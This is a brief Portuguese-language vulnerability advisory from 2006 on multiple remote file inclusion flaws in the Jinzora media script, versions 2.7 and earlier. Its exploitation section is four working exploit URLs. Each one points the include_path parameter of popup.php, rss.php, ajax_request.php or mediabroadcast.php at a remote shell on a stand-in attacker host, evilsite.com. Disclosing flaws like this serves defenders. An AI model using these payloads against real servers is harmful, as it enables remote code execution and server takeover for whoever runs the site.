|
Jinzora: Múltiplas Falhas de Inclusão de Arquivos Remotos |
|
|
|
Por Raphael Martins (Ashiyakuza)
|
|
26 de December de 2006 |
|
Nome do Script: Jinzora
Site do script: http://www.jinzora.com/
Versão Afetada: 2.7 e anteriores
Encontrado por nuffsaid
Email: nuffsaid [at] newbslove.us
Exploração:
http://[target]/[path]/popup.php?include_path=http://evilsite.com/shell.php?
http://[target]/[path]/rss.php?include_path=http://evilsite.com/shell.php?
http://[target]/[path]/ajax_request.php?include_path=http://evilsite.com/shell.php?
http://[target]/[path]/mediabroadcast.php?include_path=http://evilsite.com/shell.php?
|